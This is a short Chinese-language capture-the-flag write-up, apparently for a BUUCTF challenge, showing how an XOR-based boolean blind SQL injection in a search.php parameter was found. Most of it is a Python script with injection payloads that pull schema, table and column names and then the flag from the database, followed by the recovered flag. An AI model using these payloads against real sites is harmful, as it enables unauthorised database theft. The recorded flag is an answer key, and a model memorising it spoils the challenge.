通过尝试发现注入点在search.php。
传递?id=1^1报ERROR!!!;传递?id=1^0报NO! Not this! Click others~~~
布尔盲注
import requests
import time
url = "http://eab3a4cf-d57d-4236-a9f9-1383446ba4e1.node4.buuoj.cn:81/search.php?"
result = ''
temp = {"id" : ""}
for i in range(1,1000):
low = 27
high = 126
mid = (int)((high+low)/2)
while high > low:
time.sleep(0.1)
# database--geek
temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)" % (i, mid)
# table--Flaaaaag--F1naI1y
temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(database_name)='geek'),%d,1))>%d)" % (i, mid)
# column-fl4gawsla--password
temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),%d,1))>%d)" % (i, mid)
# flag
temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)
r = requests.post(url, params=temp)
# print(r.text)
if 'ERROR' in str(r.text):
low = mid + 1
else:
high = mid
mid = (int)((high+low)/2)
result += chr(int(mid))
print(result)
得到flag{6657ba5b-f5b1-47a4-a41f-e270acfb48cb}
参考链接:
https://blog.csdn.net/satasun/article/details/109703332